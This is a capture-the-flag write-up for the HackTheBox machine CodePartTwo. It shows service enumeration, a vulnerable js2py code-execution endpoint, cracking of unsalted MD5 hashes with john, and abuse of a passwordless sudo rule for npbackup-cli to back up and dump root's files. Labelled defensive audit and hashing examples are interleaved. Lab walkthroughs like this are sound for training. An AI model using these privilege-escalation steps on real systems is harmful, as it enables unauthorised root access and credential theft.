Box Info

Name | Difficulty
CodePartTwo | Easy

nmap

[Aug 26, 2025 - 12:47:09 (KST)] exegol-htb
CodeTwo # nmap -sC -sV codetwo.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2025-08-26 12:47 KST
Nmap scan report for codetwo.htb (10.10.11.82)
Host is up (0.52s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 a047b40c6967933af9b45db32fbc9e23 (RSA)
|   256 7d443ff1b1e2bb3d91d5da580f51e5ad (ECDSA)
|_  256 f16b1d3618067a053f0757e1ef86b485 (ED25519)
8000/tcp open  http    Gunicorn 20.0.4
|_http-title: Welcome to CodeTwo
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.77 seconds

CVE-2024-28397

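After browsing to http://codetwo.htb:8000 and logging in, the site turns out to be serving an online JavaScript editor, as shown in the screenshot.

After logging out, I found a DOWNLOAD APP link on the main page, downloaded the file, and confirmed in app.py that the editor is implemented with the js2py library, version 0.74.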

 
@app.route('/run_code', methods=['POST'])
def run_code():
    try:
        code = request.json.get('code')
        result = js2py.eval_js(code)
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})
 
if __name__ == '__main__':
    with app.app_context():
        db.create_all()
    app.run(host='0.0.0.0', debug=True)
 
[Aug 26, 2025 - 12:54:24 (KST)] exegol-htb
app # cat requirements.txt
flask==3.0.3
flask-sqlalchemy==3.1.1
js2py==0.74
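
From a code-review angle, the two risky patterns in the app.py excerpt above can be found mechanically. The following is an added example, not part of the original write-up or the application; the function names are hypothetical and the taint tracking is deliberately simple (flow-insensitive, whole module).

```python
import ast

# Abridged copy of the handler and app.run() call shown above, embedded as sample input.
SAMPLE_APP = '''
@app.route('/run_code', methods=['POST'])
def run_code():
    try:
        code = request.json.get('code')
        result = js2py.eval_js(code)
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
'''

def _reads_request(node):
    """True if the expression reads from Flask's `request` object."""
    return any(isinstance(n, ast.Name) and n.id == "request" for n in ast.walk(node))

def audit_source(source):
    """Return sorted (line, message) findings for the two risky patterns."""
    tree = ast.parse(source)
    # Names assigned straight from request data, e.g. code = request.json.get('code').
    tainted = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _reads_request(node.value):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        if node.func.attr == "eval_js":
            for arg in node.args:
                if _reads_request(arg) or (isinstance(arg, ast.Name) and arg.id in tainted):
                    findings.append((node.lineno, "request data reaches js2py.eval_js"))
        elif node.func.attr == "run":
            debug = next((k.value for k in node.keywords if k.arg == "debug"), None)
            if isinstance(debug, ast.Constant) and debug.value is True:
                findings.append((node.lineno, "app.run(debug=True) exposes the debugger"))
    return sorted(findings)

if __name__ == "__main__":
    for line, message in audit_source(SAMPLE_APP):
        print(f"line {line}: {message}")
```
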

app@codetwo:~/app$ ls
app.py    __pycache__       static     users.db
instance  requirements.txt  templates
app@codetwo:~/app$ ls instance/
users.db
app@codetwo:~/app$ sqlite3 instance/users.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
code_snippet  user
sqlite> select * from user
   ...> ;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e
[Aug 27, 2025 - 17:23:42 (KST)] exegol-htb
CodeTwo # john --wordlist=`fzf-wordlists` --format=raw-md5 hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 ASIMD 4x2])
Warning: no OpenMP support for this hash type, consider --fork=10
Note: Passwords longer than 18 [worst case UTF-8] to 55 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
s--marco_pwd-----e (?)
1g 0:00:00:00 DONE (2025-08-27 17:24) 6.667g/s 22990Kp/s 22990Kc/s 22990KC/s sweetass9..sweetangel_1
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Having obtained the credential for the marco account, I used it to log in as marco.
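
The hashes in users.db are unsalted MD5, which is why a wordlist run finishes in under a second. As an added example (not code from the application or the write-up), here is one way to store passwords with salted scrypt and upgrade legacy MD5 rows at the next successful login; the cost parameters, function names and sample accounts are assumptions.

```python
import hashlib
import hmac
import os
import re

N, R, P = 2**14, 8, 1  # scrypt cost parameters (assumed values for this example)

def legacy_md5(password):
    """The storage format seen in users.db: an unsalted MD5 hex digest."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password):
    """Salted scrypt hash, stored as scrypt$n$r$p$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=N, r=R, p=P)
    return f"scrypt${N}${R}${P}${salt.hex()}${digest.hex()}"

def verify_password(password, stored):
    """Return (ok, needs_rehash). A legacy MD5 row that verifies must be upgraded."""
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        ok = hmac.compare_digest(legacy_md5(password), stored)
        return ok, ok
    parts = stored.split("$")
    if len(parts) != 6 or parts[0] != "scrypt":
        return False, False
    n, r, p = (int(x) for x in parts[1:4])
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(parts[4]), n=n, r=r, p=p)
    ok = hmac.compare_digest(digest, bytes.fromhex(parts[5]))
    # Rehash as well when the stored cost parameters are older than the current ones.
    return ok, ok and (n, r, p) != (N, R, P)

def login(users, name, password):
    """Check a login against the users dict and upgrade weak hashes in place."""
    stored = users.get(name)
    if stored is None:
        return False
    ok, needs_rehash = verify_password(password, stored)
    if ok and needs_rehash:
        users[name] = hash_password(password)
    return ok

# Constructed sample: two accounts sharing one made-up password, stored as unsalted MD5.
USERS = {"alice": legacy_md5("correct horse"), "bob": legacy_md5("correct horse")}
```
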

root.txt

marco@codetwo:~$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User marco may run the following commands on codetwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli

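This showed that the npbackup-cli binary can be run with sudo privileges.

npbackup is a utility that performs backups based on a config file.

There was an npbackup.conf file in the home directory, so I changed only the backup_opt path to /root and ran a backup.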

marco@codetwo:~$ sudo npbackup-cli -b -c ./npbackup.conf
2025-08-27 08:10:01,777 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-27 08:10:01,796 :: INFO :: Loaded config E1057128 in /home/marco/npbackup.conf
2025-08-27 08:10:01,804 :: INFO :: Searching for a backup newer than 1 day, 0:00:00 ago
2025-08-27 08:10:03,387 :: INFO :: Snapshots listed successfully
2025-08-27 08:10:03,388 :: INFO :: No recent backup found in repo default. Newest is from 2025-04-06 03:50:16.222832+00:00
2025-08-27 08:10:03,388 :: INFO :: Runner took 1.584407 seconds for has_recent_snapshot
2025-08-27 08:10:03,388 :: INFO :: Running backup of ['/root'] to repo default
2025-08-27 08:10:04,191 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excluded_extensions
2025-08-27 08:10:04,191 :: ERROR :: Exclude file 'excludes/generic_excluded_extensions' not found
2025-08-27 08:10:04,191 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excludes
2025-08-27 08:10:04,191 :: ERROR :: Exclude file 'excludes/generic_excludes' not found
2025-08-27 08:10:04,191 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/windows_excludes
2025-08-27 08:10:04,191 :: ERROR :: Exclude file 'excludes/windows_excludes' not found
2025-08-27 08:10:04,192 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/linux_excludes
2025-08-27 08:10:04,192 :: ERROR :: Exclude file 'excludes/linux_excludes' not found
2025-08-27 08:10:04,192 :: WARNING :: Parameter --use-fs-snapshot was given, which is only compatible with Windows
no parent snapshot found, will read all files
 
Files:          15 new,     0 changed,     0 unmodified
Dirs:            8 new,     0 changed,     0 unmodified
Added to the repository: 190.612 KiB (39.881 KiB stored)
 
processed 15 files, 197.660 KiB in 0:00
snapshot 26ade748 saved
2025-08-27 08:10:05,024 :: INFO :: Backend finished with success
2025-08-27 08:10:05,025 :: INFO :: Processed 197.7 KiB of data
2025-08-27 08:10:05,026 :: ERROR :: Backup is smaller than configured minmium backup size
2025-08-27 08:10:05,026 :: ERROR :: Operation finished with failure
2025-08-27 08:10:05,026 :: INFO :: Runner took 3.222844 seconds for backup
2025-08-27 08:10:05,026 :: INFO :: Operation finished
2025-08-27 08:10:05,031 :: INFO :: ExecTime = 0:00:03.256790, finished, state is: errors.
 
marco@codetwo:~$ sudo npbackup-cli --ls -c ./npbackup.conf
2025-08-27 08:11:59,494 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-27 08:11:59,513 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-08-27 08:11:59,519 :: INFO :: Showing content of snapshot latest in repo default
2025-08-27 08:12:01,110 :: INFO :: Successfully listed snapshot latest content:
snapshot 26ade748 of [/root] at 2025-08-27 08:10:04.199784763 +0000 UTC by root@codetwo filtered by []:
/root
/root/.bash_history
/root/.bashrc
/root/.cache
/root/.cache/motd.legal-displayed
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.local/share/nano/search_history
/root/.mysql_history
/root/.profile
/root/.python_history
/root/.sqlite_history
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.vim
/root/.vim/.netrwhist
/root/root.txt
/root/scripts
/root/scripts/backup.tar.gz
/root/scripts/cleanup.sh
/root/scripts/cleanup_conf.sh
/root/scripts/cleanup_db.sh
/root/scripts/cleanup_marco.sh
/root/scripts/npbackup.conf
/root/scripts/users.db
 
2025-08-27 08:12:01,110 :: INFO :: Runner took 1.590647 seconds for ls
2025-08-27 08:12:01,110 :: INFO :: Operation finished
2025-08-27 08:12:01,114 :: INFO :: ExecTime = 0:00:01.621902, finished, state is: success.
marco@codetwo:~$ sudo npbackup-cli --dump /root/root.txt -c ./npbackup.conf
3---------root.txt-------------a
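
The root cause on the sudo side is that the rule lists npbackup-cli without arguments, so sudo accepts any arguments, including -c with a config the user controls. The audit below is an added example, not part of the original write-up: it parses `sudo -l` output and flags such rules. The second rule in the sample and its /etc/npbackup/ path are hypothetical, as is the list of user-writable prefixes.

```python
import re

# Constructed sample: the rule from the `sudo -l` output above, plus a pinned variant
# for contrast. The /etc/npbackup/ path is hypothetical, not taken from the box.
SUDO_L = """\
User marco may run the following commands on codetwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli
    (root) NOPASSWD: /usr/local/bin/npbackup-cli -b -c /etc/npbackup/npbackup.conf
"""

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>/.*)$")
# Prefixes assumed to be writable by unprivileged users (assumption for this example).
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/", "./", "~")

def audit_sudo_l(text):
    """Return (command, issue) pairs for NOPASSWD rules that leave arguments open."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m or "NOPASSWD" not in m["tags"]:
            continue
        # Commands are comma-separated; a literal comma inside arguments is written "\,".
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            path, _, args = cmd.partition(" ")
            if not args:
                # sudoers: a command listed without arguments may be run with any arguments.
                findings.append((path, "any arguments allowed"))
            elif any(a.startswith(USER_WRITABLE) for a in args.split()):
                findings.append((path, "argument points at a user-writable path"))
    return findings

if __name__ == "__main__":
    for command, issue in audit_sudo_l(SUDO_L):
        print(f"{command}: {issue}")
```

Pinning the arguments in the rule only helps if the referenced config file is itself owned by root and not writable by the user.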